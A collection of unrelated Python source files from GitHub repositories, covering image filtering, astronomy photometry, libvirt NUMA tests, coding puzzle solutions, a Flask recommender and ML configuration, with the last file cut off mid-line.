+{"seq_id":"8497590736","text":"import cv2\r\nimport PySimpleGUI as sg\r\nfrom PIL import Image, ImageOps\r\nimport numpy as np\r\nimport webbrowser\r\nfrom math import pi\r\n\r\nthresh=255\r\ngotImg=False\r\ngotTImg=False\r\nurl = \"https://homepages.inf.ed.ac.uk/rbf/CVonline/LOCAL_COPIES/TRAPP1/filter.html\"\r\n\r\nsg.theme('GreenTan')\r\nphotoO=[[sg.Image('',k='orig')]]\r\nphotoU=[[sg.Image('',background_color='black',k='updated')]]\r\n\r\ndef win1():\r\n layout1=[[sg.Input(size=80,key='fileB',enable_events=True),sg.FileBrowse(button_text='Browse All')],\r\n [sg.Frame('Original',photoO,size=(640,360),element_justification='center'),\r\n sg.Frame('Updated',photoU,size=(640,360),element_justification='center')],\r\n [sg.vbottom(sg.Text(\"Kernel Size:\")),sg.Slider(range=(1,10),orientation='h',default_value=1,enable_events=True,resolution=1,k='ksize')],\r\n #Kernel Size:\r\n [sg.vbottom(sg.Text(\"Sigma \")),sg.Slider(range=(0.4,2.5),orientation='h',default_value=0.4,enable_events=True,resolution=0.1,k='sigma')],\r\n\r\n [sg.vbottom(sg.Text(\"Theta \")),sg.Slider(range=(0,pi),orientation='h',default_value=0,enable_events=True,resolution=pi/16,k='theta')],\r\n\r\n [sg.vbottom(sg.Text(\"Lambda \")),sg.Slider(range=(1,5),orientation='h',default_value=1,enable_events=True,resolution=1,k='hl3')],\r\n\r\n [sg.vbottom(sg.Text(\"Gamma \")),sg.Slider(range=(0.2,1),orientation='h',default_value=0.2,enable_events=True,resolution=0.1,k='hulk')],\r\n\r\n [sg.vbottom(sg.Text(\"Psi \")),sg.Slider(range=(-pi,pi),orientation='h',default_value=0,enable_events=True,resolution=pi/8,k='spy')],\r\n [sg.Save()]]\r\n return sg.Window('Image Processing - Gabor Filter',layout1,relative_location=(0,-100),finalize=True)\r\n\r\n\r\ndef win2():\r\n layout2 = [[sg.Text(f'''General Instructions\r\n1. If the image output does not get updated recheck the selected checkbox to update output\r\n\r\n2.Input Image from your local directory, It can only read Image Files, any other file type will lead to error.\r\n\r\n3. Image can be of any dimensions, the implementation here will automatically modify the dimensions to (Width=640px,\r\nLength= 360px) \r\n\r\n4. The slider Values here represents the threshold for the five primary properties: Kernel Size,Sigma, Theta ,\r\nlambda,gamma and psi\r\n\r\n5.The Output Image can be saved by clicking on the save button, The default format is .png \r\n\r\n6. To access additional theory you require Internet access\r\n\r\n7. If you select the save option and close without specifying the save directory the module fails \r\n\r\n***************************************************************************\r\nImplementation by:\r\n\r\nViswadruth Akkaraju, Atanu Wadhwa and K Priya \r\n\r\nMachine Perception and Cognition class \r\n\r\nSRM Institute of Science and Technology\r\n***************************************************************************''', font='Lucida', size=(50, 33))],\r\n [sg.Button('Hyperlink to theory', font='Lucida', enable_events=True, key=\"-LINK-\")]]\r\n\r\n return sg.Window('Help', layout2, finalize=True)\r\n\r\nwindow1, window2 = win1(), win2()\r\n\r\ndef rez(image):\r\n color_converted = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n pil_image = Image.fromarray(color_converted)\r\n x = ImageOps.pad(pil_image, (640, 360), color=None, centering=(0.5, 0.5))\r\n np_img = np.array(x)\r\n opencv_image = cv2.cvtColor(np_img, cv2.COLOR_RGB2BGR)\r\n return opencv_image\r\n\r\nwhile True:\r\n window, event, values = sg.read_all_windows()\r\n if event == 'fileB':\r\n img=cv2.imread(values['fileB'])\r\n img = rez(img)\r\n window['orig'].update(data=cv2.imencode('.ppm', img)[1].tobytes())\r\n window['updated'].update(data=cv2.imencode('.ppm', img)[1].tobytes())\r\n gotImg=True\r\n fPath=values['fileB'].rsplit('/',1)[0]\r\n\r\n if gotImg:\r\n temp = int(values['ksize'])\r\n kernel = (temp, temp)\r\n kern = cv2.getGaborKernel(ksize=kernel, sigma=float(values['sigma']), theta=float(values['theta']),\r\n lambd=int(values['hl3']), gamma=float(values['hulk']), psi=float(values['spy']),\r\n ktype=cv2.CV_32F)\r\n kern /= 1.5 * kern.sum()\r\n img_f = cv2.filter2D(img, cv2.CV_8UC3, kern)\r\n img_f = np.maximum(np.zeros_like(img), img_f, np.zeros_like(img))\r\n window['updated'].update(data=cv2.imencode('.png', img_f)[1].tobytes())\r\n gotTImg=True\r\n\r\n if event == 'Save' and gotTImg:\r\n saveFile= sg.popup_get_file('',save_as=True,no_window=True,\r\n initial_folder=fPath,default_extension='.png')\r\n cv2.imwrite(saveFile,img_f)\r\n\r\n if event in (sg.WIN_CLOSED, 'Exit'):\r\n sg.popup('Close all windows')\r\n break\r\n\r\n if event == '-LINK-':\r\n sg.popup('Redirect to website')\r\n webbrowser.open(url)\r\n\r\nwindow.close()","repo_name":"ICB-TO/Image-Processing-simulation-modules","sub_path":"gabfilt.py","file_name":"gabfilt.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1443068429","text":"from dataclasses import dataclass\n\n@dataclass\nclass Local:\n name: str\n time: str\n master_rank: str\n skill_name: str\n flavor: str\n start: str\n over: str\n description: str\n ver: str\n ver_time: int\n\n# local\njp_local = Local(\n name='jp_name',\n time='jp_time',\n master_rank='jp_master_rank',\n skill_name='jp_skill_name',\n flavor='jp_flavor',\n start='jp_start',\n over='jp_over',\n description='jp_description',\n ver='jp',\n ver_time=9\n)\nas_local = Local(\n name='as_name',\n time='as_time',\n master_rank='as_master_rank',\n skill_name='as_skill_name',\n flavor='as_flavor',\n start='as_start',\n over='as_over',\n description='as_description',\n ver='as',\n ver_time=8\n)\n","repo_name":"zkelly3/MLTD-Data","sub_path":"web/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74763039259","text":"import math as m\n\ndef main():\n n = eval(input(\"What number in the Fibonnaci sequence would you like to see?: \"))\n count = 0\n x = 1\n y = 0\n\n while count < n:\n count = count + 1\n z = x + y\n x = y\n y = z\n print(z)\n\nmain()\n","repo_name":"drycode/zelle-python","sub_path":"chap08/exercise_1.py","file_name":"exercise_1.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"69"}
+{"seq_id":"19807738776","text":"from unittest import TestCase\nfrom nesta.packages.nlp_utils.ngrammer import Ngrammer\n\n\nclass TestNgrammer(TestCase):\n def test_ngrammer(self):\n ngrammer = Ngrammer(database=\"production_tests\")\n ngrammer.ngrams.clear()\n ngrammer.ngrams[3].add('convolutional_neural_networks')\n ngrammer.ngrams[3].add('bed_and_breakfast')\n ngrammer.ngrams[2].add('neural_networks')\n document = (\"This is a document about machine \"\n \"learning, convolutional neural networks, \"\n \"neural networks and bed and breakfast\")\n processed_doc = ngrammer.process_document(document)\n for _, ngrams in ngrammer.ngrams.items():\n for ng in ngrams:\n self.assertIn(ng, processed_doc[0])\n","repo_name":"nestauk/old_nesta_daps","sub_path":"nesta/packages/nlp_utils/tests/test_ngrammer.py","file_name":"test_ngrammer.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"69"}
+{"seq_id":"12330684770","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom astropy.stats import sigma_clipped_stats\nfrom matplotlib.patches import Circle\nfrom photutils import CircularAperture, CircularAnnulus, aperture_photometry\nfrom astropy.io import fits\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom photutils.utils import calc_total_error\nimport argparse\nimport logging\nimport sys\nfrom astropy.wcs import WCS\n\n# In[2]:\ndef get_logger(namespace, level='DEBUG', logfile=None):\n logger = logging.getLogger(namespace)\n formatter = logging.Formatter('%(name)s [l %(lineno)d] - %(levelname)s - %(message)s')\n\n if logfile is None:\n handler = logging.StreamHandler(sys.stdout)\n\n else:\n handler = logging.FileHandler(logfile)\n\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(level)\n return logger\n\n\ndef make_cutouts(\n image_path: str,\n position,\n half_size\n):\n data = fits.getdata(image_path)\n y_image_size, x_image_size = np.shape(data)\n x, y = position\n # logger.debug(f'{x},{y},{np.shape(data)}')\n if np.logical_and(x < half_size,y < half_size):\n cutout = data[0:y+half_size+1, 0:x+half_size+1]\n n_xpix = half_size-y\n n_ypix = half_size-x\n cutout = np.pad(cutout, ((n_ypix, 0), (n_xpix, 0)), 'constant')\n\n elif np.logical_and(x+half_size+1 > x_image_size, y+half_size+1 > y_image_size):\n cutout = data[y - half_size: y_image_size, x-half_size, x_image_size]\n n_xpix = (half_size+x+1) - x_image_size\n n_ypix = (half_size+y+1) - y_image_size\n cutout = np.pad(cutout, ((0, n_ypix), (0, n_xpix)), 'constant')\n\n elif y < half_size:\n logger.info(f'Cutout parameters are {y + half_size + 1}, {x - half_size}, {x + half_size + 1},{y_image_size},'\n f'{x_image_size}')\n cutout = data[0:y + half_size + 1, x - half_size:x + half_size + 1]\n n_pix = half_size - y\n cutout = np.pad(cutout, ((n_pix, 0), (0, 0)), 'constant')\n\n elif y + half_size + 1 > y_image_size:\n cutout = data[y - half_size: y_image_size, x - half_size: x + half_size + 1]\n n_pix = (half_size + y + 1) - y_image_size\n cutout = np.pad(cutout, ((0, n_pix), (0, 0)), 'constant')\n\n elif x < half_size:\n cutout = data[y - half_size: y + half_size + 1, 0:x + half_size + 1]\n n_pix = half_size - x\n cutout = np.pad(cutout, ((0, 0), (n_pix, 0)), 'constant')\n elif x + half_size > x_image_size:\n cutout = data[y - half_size:y + half_size + 1, x - half_size:x_image_size]\n n_pix = (half_size + x + 1) - x_image_size\n cutout = np.pad(cutout, ((0, 0), (0, n_pix)), 'constant')\n else:\n cutout = data[y - half_size:y + half_size + 1, x - half_size:x + half_size + 1]\n return cutout\n\n\n# In[73]:\n\n\ndef get_aperture_counts(diff_cutout, aper_diameter, bkg_in_diameter, bkg_out_diameter, x_offset = None, \n y_offset = None, gain=None, plot=False):\n\n # w = WCS(header)\n # x,y = w.all_world2pix(ra,dec,0)\n x, y = int(diff_cutout.shape[0] / 2), int(diff_cutout.shape[1] / 2)\n if x_offset is not None:\n x += x_offset\n y += y_offset\n if plot:\n fig, ax = plt.subplots()\n m, s = np.nanmean(diff_cutout), np.nanstd(diff_cutout)\n im = ax.imshow(diff_cutout, interpolation='nearest', cmap='gray',\n vmin=m - s, vmax=m + 10 * s, origin='lower')\n # c = Circle(xy=(x_img, y_img),radius=15)\n\n c = Circle(xy=(x, y), radius=aper_diameter / 2)\n c1 = Circle(xy=(x, y), radius=bkg_in_diameter / 2)\n c2 = Circle(xy=(x, y), radius=bkg_out_diameter / 2)\n c.set_facecolor('none')\n c.set_edgecolor('red')\n c1.set_facecolor('none')\n c1.set_edgecolor('red')\n c2.set_facecolor('none')\n c2.set_edgecolor('red')\n ax.add_artist(c)\n ax.add_artist(c1)\n ax.add_artist(c2)\n ax.set_xlim(x - 30, x + 30)\n ax.set_ylim(y - 30, y + 30)\n plt.savefig(r'aper_phot.pdf',bbox_inches='tight')\n\n aperture = CircularAperture((x, y), r=aper_diameter)\n annulus_aperture = CircularAnnulus((x, y), r_in=bkg_in_diameter / 2, r_out=bkg_out_diameter / 2)\n\n annulus_masks = annulus_aperture.to_mask(method='center')\n annulus_data = annulus_masks.multiply(diff_cutout)\n mask = annulus_masks.data\n annulus_data_1d = annulus_data[mask > 0]\n bkg_mean, bkg_median, bkg_std = sigma_clipped_stats(annulus_data_1d, sigma=2)\n # print(bkg_mean, bkg_median)\n bkg = np.zeros(diff_cutout.shape) + bkg_median\n bkg_error = np.zeros(diff_cutout.shape) + bkg_std\n\n aperture_mask = aperture.to_mask(method='center')\n \n if gain is None:\n gain = 1\n print('Gain not provided, setting gain to 1, uncertainties will be incorrect (underestimated)')\n \n effective_gain = gain\n error = calc_total_error(diff_cutout, bkg_error, effective_gain)\n phot_table = aperture_photometry(diff_cutout - bkg, aperture, error=error)\n counts = phot_table['aperture_sum'][0]\n counts_err = phot_table['aperture_sum_err'][0]\n \n return counts, counts_err\n\n\ndef aper_photometry(imgname, x, y, zp, aper_diameter, bkg_in_diameter, bkg_out_diameter, gain=None, cutout_size=None, plot=False):\n x_int, y_int = int(x), int(y)\n x_offset, y_offset = x - x_int, y - y_int\n position=(x_int, y_int)\n \n if cutout_size is None:\n cutout_size = bkg_out+20\n \n cutout = make_cutouts(imgname,position,half_size=int(cutout_size))\n\n counts, countserr = get_aperture_counts(diff_cutout=cutout, aper_diameter=aper_diameter, bkg_in_diameter=bkg_in, bkg_out_diameter=bkg_out, x_offset=x_offset, y_offset=y_offset, gain=gain, plot=plot)\n\n mag = -2.5*np.log10(counts) + zp\n magunc = 1.086*countserr/counts\n\n return mag, magunc\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"img\",type=str,help=\"Image name\")\n parser.add_argument(\"--ra\",type=float,default=None,help=\"RA\")\n parser.add_argument(\"--dec\",type=float,default=None,help=\"Dec\")\n parser.add_argument(\"--x\",type=float,default=None,help=\"x coordinate\")\n parser.add_argument(\"--y\",type=float,default=None,help=\"y coordinate\")\n parser.add_argument(\"--zp_key\",type=str,default='TMC_ZP',help=\"zeropoint key in header\")\n parser.add_argument(\"--gain_key\",type=str,default='GAIN',help=\"gain key in header\")\n parser.add_argument(\"--zp\",type=float,default=None,help=\"zeropoint\")\n parser.add_argument(\"--gain\",type=float,default=None,help=\"gain\")\n parser.add_argument(\"--aper\",type=float,default=5,help=\"aperture diameter\")\n parser.add_argument(\"--bkg_in\",type=float,default=20,help=\"background inner annulus diameter\")\n parser.add_argument(\"--bkg_out\",type=float,default=30,help=\"background outer annulus diameter\")\n parser.add_argument(\"--plot\",action='store_true', help=\"Plot thumbnail with apertures\")\n parser.add_argument(\"--cutout_size\",type=float,default=None,help=\"Cutout size for display\")\n\n\n args = parser.parse_args()\n\n logger = get_logger(__name__)\n \n\n imgname = args.img\n zp_key = args.zp_key\n gain_key = args.gain_key\n zp = args.zp\n cutout_size = args.cutout_size\n\n if zp is None:\n try:\n zp = float(fits.getval(imgname, zp_key))\n except KeyError:\n zp = 0\n logging.warning(f'Zeropoint not specified, or not found in header. Setting it to {zp}')\n\n x, y = args.x, args.y\n ra, dec = args.ra, args.dec\n if args.x is None:\n header = fits.getheader(imgname)\n wcs = WCS(header)\n if np.logical_or(ra is None, dec is None):\n err = 'Ra/Dec and x/y are not specified. Please specify either'\n logger.error(err)\n raise ValueError\n x, y = wcs.all_world2pix(ra,dec,0)\n\n logger.info(f'Setting x/y x : {x}, y:{y}')\n\n gain = args.gain\n\n if gain is None:\n try:\n gain = float(fits.getval(imgname, gain_key))\n\n except KeyError:\n gain = 1\n logger.warn(f'Gain not specified, or found in header. Setting to {gain}')\n\n\n aper_radius = args.aper\n bkg_in = args.bkg_in\n bkg_out = args.bkg_out\n mag, magunc = aper_photometry(imgname, x=x, y=y, zp=zp, aper_diameter=aper_radius, bkg_in_diameter=bkg_in, bkg_out_diameter=bkg_out, gain=gain, plot=args.plot, cutout_size=cutout_size)\n logger.info(f'Mag: {mag}, magerr: {magunc}')","repo_name":"virajkaram/ztf_utils","sub_path":"aperture_photometry.py","file_name":"aperture_photometry.py","file_ext":"py","file_size_in_byte":8535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30435942279","text":"from avocado.utils import cpu\n\nfrom virttest import libvirt_cgroup\nfrom virttest import libvirt_version\nfrom virttest import utils_misc\nfrom virttest import virsh\n\nfrom virttest.libvirt_xml import vm_xml\nfrom virttest.utils_test import libvirt\n\n\ndef set_cpu_state(operate_cpu, set_value):\n \"\"\"\n Set cpu online or offline\n\n :params: operate_cpu: specific cpu index\n :params: set_value: 1 for online, 0 for offline\n \"\"\"\n if set_value == \"0\":\n cpu.online(operate_cpu)\n elif set_value == \"1\":\n cpu.offline(operate_cpu)\n\n\ndef run(test, params, env):\n \"\"\"\n Verify numa tuned guest vm is not affected when cpu is offline\n \"\"\"\n\n def setup_test():\n \"\"\"\n Prepare init xml\n \"\"\"\n numa_info = utils_misc.NumaInfo()\n online_nodes = numa_info.get_online_nodes_withmem()\n test.log.debug(\"Get online node with memory:%s\", online_nodes)\n\n node_cpus = numa_info.get_all_node_cpus()[\n online_nodes[offline_node_index]].strip().split(' ')\n\n params.update({'nodeset': online_nodes[nodeset_index]})\n params.update({'off_cpu': node_cpus[cpu_index]})\n set_cpu_state(params.get('off_cpu'), offline)\n is_cgroupv2 = libvirt_cgroup.CgroupTest(None).is_cgroup_v2_enabled()\n if not is_cgroupv2:\n test.log.debug(\"Need to keep original value in cpuset file under \"\n \"cgroup v1 environment for later recovery\")\n default_cpuset = libvirt_cgroup.CgroupTest(None).\\\n get_cpuset_cpus(vm_name)\n params.update({'default_cpuset': default_cpuset})\n\n def run_test():\n \"\"\"\n Start vm and check result\n \"\"\"\n test.log.info(\"TEST_STEP1: Set hugepage and guest boot \")\n vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n vm_attrs_new = eval(vm_attrs % params['nodeset'])\n vmxml.setup_attrs(**vm_attrs_new)\n\n result = virsh.define(vmxml.xml, debug=True, ignore_status=True)\n if libvirt_version.version_compare(9, 4, 0) and \\\n tuning == \"restrictive\" and binding == \"guest\":\n libvirt.check_result(result, expected_fails=err_msg,\n check_both_on_error=True)\n return\n else:\n libvirt.check_exit_status(result)\n\n vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n test.log.debug(\"The new xml is:\\n%s\", vmxml)\n\n test.log.info(\"TEST_STEP2: Start vm\")\n vm.start()\n\n def teardown_test():\n \"\"\"\n Clean data.\n \"\"\"\n test.log.info(\"TEST_TEARDOWN: Clean up env.\")\n bkxml.sync()\n is_cgroupv2 = libvirt_cgroup.CgroupTest(None).is_cgroup_v2_enabled()\n if not is_cgroupv2:\n test.log.debug(\"Reset cpuset file under cgroup v1 environment\")\n libvirt_cgroup.CgroupTest(None).set_cpuset_cpus(\n params['default_cpuset'], vm_name)\n\n vm_name = params.get(\"main_vm\")\n vm = env.get_vm(vm_name)\n vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n bkxml = vmxml.copy()\n\n vm_attrs = params.get(\"vm_attrs\")\n nodeset_index = int(params.get('nodeset_index'))\n offline_node_index = int(params.get('offline_node_index'))\n cpu_index = int(params.get('cpu_index'))\n offline = params.get(\"offline\")\n err_msg = params.get(\"err_msg\")\n tuning = params.get(\"tuning\")\n binding = params.get(\"binding\")\n\n try:\n setup_test()\n run_test()\n\n finally:\n teardown_test()\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/numa/guest_numa_node_tuning/numa_mem_binding_with_offline_cpu.py","file_name":"numa_mem_binding_with_offline_cpu.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"4083279272","text":"'''\nhttps://leetcode-cn.com/problems/max-value-of-equation/\n1499. 满足不等式的最大值\n'''\nfrom typing import List\n\nclass Solution:\n def findMaxValueOfEquation(self, points: List[List[int]], k: int) -> int:\n '''\n 坐标 x 的值从小到大排序\n premin/max\n 求 y[i] + y[j] +|x[i]-x[j]| 最大,且 |x[i]-x[j]| <=k\n i > j => y[i] + x[i] + y[j] - x[j]\n 维护一个y[j] - x[j] 的递减队列,\n '''\n ans = -1e9\n \n '''\n queue : 上界:x[j] >= x[i]-k\n 下界:j<=i-1\n '''\n q = []\n for i, p in enumerate(points):\n # 清除不符合条件的队列内容 x2-x1 > k两点间距离>k\n while q and points[q[0]][0] < p[0]-k:\n q.pop(0) # pop 左侧pop\n\n # ans = max(ans, y[i] + x[i] + y[j] - x[j])\n if q:\n x = points[q[0]]\n ans = max(ans, p[1] + p[0] + x[1]-x[0])\n \n '''\n 维护queue单调性是 y[j]-x[j]的递减队列\n 如果当前队列中y-x < 当前y-x就去除掉\n '''\n while q and \\\n points[q[-1]][1] - points[q[-1]][0] <= p[1]-p[0]:\n q.pop() # 右侧pop y1-x1 < y-x \n q.append(i) # 把当前点加入到队尾\n return ans\n","repo_name":"zhuangzhi/leetcode","sub_path":"week7/le1499.py","file_name":"le1499.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27266016694","text":"from pathlib import Path\nfrom collections import deque\nfrom typing import Optional\n\ndir_path = Path(__file__).resolve().parent\nwith open(f\"{dir_path}/day10_input.txt\") as file:\n data = file.read().splitlines()\n\n\ndef cycle(input: list[str]) -> list[int]:\n stack = deque()\n for line in input:\n if \"noop\" in line:\n stack.append(None)\n else:\n _, val = line.split(\" \")\n stack.append(int(val))\n cycle, X = 0, 1\n cycles = list()\n while len(stack) > 0:\n register = stack.popleft() if stack else None\n if register:\n cycles.append(X)\n cycles.append(X)\n X += register\n else:\n cycles.append(X)\n return cycles\n\n\ndef calculate_signals(cycles: list[int]) -> list[tuple[int, int]]:\n return [\n (cycles[x], (x + 1) * cycles[x])\n for x in range(len(cycles))\n if x + 1 in {20, 60, 100, 140, 180, 220}\n ]\n\n\ndef draw_sprite(cycles: list[int]) -> None:\n for x in range(0, 240, 40):\n draw_line(cycles[x : x + 40])\n\n\ndef draw_line(cycles: list[int]) -> None:\n line = \"\"\n for i, idx in enumerate(cycles):\n if i in [idx-1, idx, idx+1]:\n line+='#'\n else:\n line+='.'\n print(line)\n\ncycles = cycle(data)\n\nsignals = calculate_signals(cycles)\nprint(sum([y for x, y in signals]))\n\ndraw_sprite(cycles)\n","repo_name":"neil-sriv/advent_of_code","sub_path":"2022/completed/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7161080310","text":"__author__ = 'jason.parent@carneylabs.com (Jason Parent)'\n\n# Django imports...\nfrom django.conf.urls import patterns\nfrom django.conf.urls import url\n\nurlpatterns = patterns('users.views',\n url(r'^$', 'home_view', name='home'),\n url(r'^list/$', 'list_view', name='list'),\n url(r'^requests/$', 'requests_view', name='requests'),\n url(r'^friends/$', 'friends_view', name='friends'),\n url(r'^friends/(?P\\d+)/add/$', 'add_view', name='add'),\n url(r'^friends/(?P\\d+)/accept/$', 'accept_view', name='accept'),\n url(r'^friends/(?P\\d+)/reject/$', 'reject_view', name='reject'),\n url(r'^feed/$', 'feed_view', name='feed'),\n)","repo_name":"ParentJA/friends_with_recipes","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14273687788","text":"# this activity will allow encryption and decryption of vowels only.\n\n# define when to stop\n\nuser_stop = False\n\n# simple greeting!\nprint(\"Hi there! I am PyCipher-Simple! I only encrypt and decrypt vowels.\")\n\nwhile user_stop == False:\n\n # ask user to input an encrypted statement.\n encrypted = input(\"Indicate whether you wish to 'encrypt', 'decrypt', or 'stop' the program: \")\n\n # check if the user wanted to stop\n\n if encrypted.lower() == \"stop\":\n\n #set the initial variable to True to break the loop\n\n user_stop = True\n\n # say goodbye!\n \n print(\"Goodbye and hope to see you again!\")\n \n #encoder\n if encrypted.lower() == \"encrypt\":\n #ask for word to encrypt\n to_encrypt = input(\"You have chosen 'encrypt'! Please type the message to encode: \")\n\n #replace every vowel with the equivalent cipher symbol.\n first_vowel = to_encrypt.replace('a', '*')\n second_vowel = first_vowel.replace('e', '&')\n third_vowel = second_vowel.replace('i', '#')\n fourth_vowel = third_vowel.replace('o', '+')\n encrypt_final = fourth_vowel.replace('u', '!')\n\n #print the result!\n print(\"Original text: \", to_encrypt)\n print(\"Encrypted version: \", encrypt_final)\n\n if encrypted.lower() == \"decrypt\":\n # ask for word to decrypt\n todecypt = input(\"You have chosen 'decrypt'! Please type the message to decode: \")\n\n # attempt to replace every encrypted symbol with an appropriate equivalent.\n first_vowel = todecypt.replace('*', 'a')\n second_vowel = first_vowel.replace('&', 'e')\n third_vowel = second_vowel.replace('#', 'i')\n fourth_vowel = third_vowel.replace('+', 'o')\n final_decrypted = fourth_vowel.replace('!', 'u')\n\n # print the decrypted message in low caps\n print(\"The encrypted message is: \", todecypt)\n print(\"The decrypted message is: \", final_decrypted.lower())","repo_name":"EnzoPinon/Py-cipher","sub_path":"pycipher-simple.py","file_name":"pycipher-simple.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72651835740","text":"# LeetCode 200. Number of Island\n# https://leetcode.com/problems/number-of-islands/\n\n# 섬의 갯수를 세는 문제 (DFS)\n\n# Runtime : 415ms(76.39%)\n# Memory Usage : 16.9MB (6.67%)\n\n# if not grid : return 0 추가하면 속도 훨씬 빨라짐.\n\nclass Solution: \n def numIslands(self, grid: List[List[str]]) -> int:\n answer = 0\n for y in range(len(grid)): # len(grid) -> grid의 원소 갯수 4 출력 0~3\n for x in range(len(grid[0])): # 여기서 len(grid[0])면 5가 출력 0~4\n if grid[y][x] == '1': # grid[y][x]의 값이 1일 경우 answer 1씩 가산 \n self.count(y,x,grid) # 그 후 상하좌우 1값지우는 재귀함수\n answer +=1\n \n return answer\n \n def count(self, y, x, grid):\n if y < 0 or x < 0 or y >= len(grid) or x >= len(grid[0]) or grid[y][x] != '1':\n return\n grid[y][x] = '#'\n self.count(y+1,x,grid) # 상\n self.count(y-1,x,grid) # 하\n self.count(y,x-1,grid) # 좌\n self.count(y,x+1,grid) # 우","repo_name":"Leepilung/Algorithm_Study","sub_path":"LeetCode/medium/200.py","file_name":"200.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15404846237","text":"import cv2\n\nindex = 0\nframes = []\n\nwhile True:\n cap = cv2.VideoCapture(index)\n if not cap.read()[0]:\n break\n else:\n print(f\"Camera Device {index}: OK\")\n\n index += 1\n\nwhile True:\n index = 0\n frames = []\n\n # Capture frames from all connected cameras\n while True:\n cap = cv2.VideoCapture(index)\n if not cap.read()[0]:\n break\n ret, frame = cap.read()\n frames.append(frame)\n index += 1\n\n # Concatenate frames horizontally and display the result\n if frames:\n result = cv2.hconcat(frames)\n cv2.imshow(\"Video Feed\", result)\n\n if cv2.waitKey(1) == ord('q'):\n break\n\ncv2.destroyAllWindows()\n","repo_name":"shri-vibhor-sharma/python-apps","sub_path":"video-cam-feed.py","file_name":"video-cam-feed.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72076745181","text":"import pandas as pd\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\nfrom recommender import params, simple_search, keyword_search\nfrom prepare import gen_sim_matrix\n\napp = Flask(__name__)\nCORS(app)\ndf = None\ncosine_func = None\n\n\n@app.route('/', methods=['GET'])\ndef entry():\n return jsonify(message='Ready')\n\n\n@app.route('/simple', methods=['GET'])\ndef simple():\n cuisine = request.args.get('cuisine', params['cuisine'])\n price = request.args.get('price', params['price'])\n city = request.args.get('city', params['city'])\n\n print('Simple search for: ', cuisine, price, city)\n\n results = simple_search(df, cuisine=cuisine, price=price, city=city)\n return jsonify(results)\n\n\n@app.route('/keyword', methods=['GET'])\ndef keyword():\n searchword = request.args.get('name', '')\n\n if searchword == '':\n return jsonify(message='Provide a restaurant name.')\n\n print('Keyword search for: ', searchword)\n\n results = keyword_search(df, cosine_func, searchword)\n return jsonify(results)\n\n\nif __name__ == '__main__':\n print('Loading dataset.')\n df = pd.read_pickle('./data/dataset.pkl')\n print('Generating sim matrix')\n cosine_func = gen_sim_matrix(df)\n app.run(host='0.0.0.0', port=80)\n","repo_name":"hmatalonga/restaurant-recommender-system","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29399934453","text":"from dotmap import DotMap\nfrom torch import nn\nfrom torch.optim import Adam\nimport torch\n\nfrom torch_utils import empirical_kl\nfrom trainers.modify_mnist_trainer import ModifyMNISTTrainer\nfrom data.modify_mnist_data import MNISTData\nfrom models.lenet5 import lenet5\n\nconfig = DotMap()\nconfig.seed = 1234\n\nconfig.trainer = ModifyMNISTTrainer\nconfig.tp.epochs = 5\nconfig.tp.log_train_every = 1000\nconfig.tp.loss = nn.NLLLoss()\nconfig.tp.teacher_loss = nn.NLLLoss()\nconfig.tp.student_loss = nn.NLLLoss()\nconfig.tp.test_loss = nn.NLLLoss() \nconfig.tp.use_gpu = True\nconfig.tp.device = torch.device('cuda') if config.tp.use_gpu else torch.device('cpu')\n\nconfig.opt = Adam\nconfig.op.lr = 1e-3\n\nconfig.dataset = MNISTData\nconfig.dp.device = config.tp.device\nconfig.dp.seed = config.seed\nconfig.dp.batch_size = 128\nconfig.dp.resolution = (28, 28)\nconfig.dp.num_classes = 10\n\nconfig.teacher.model = lenet5\nconfig.teacher.device = config.tp.device\nconfig.teacher.input_size = config.dp.resolution[0] * config.dp.resolution[1]\nconfig.teacher.output_size = config.dp.num_classes\nconfig.teacher.activation = nn.ReLU()\nconfig.teacher.output_activation= nn.LogSoftmax(dim=1)\n\nconfig.student.model = lenet5\nconfig.student.device = config.tp.device\nconfig.student.input_size = config.dp.resolution[0] * 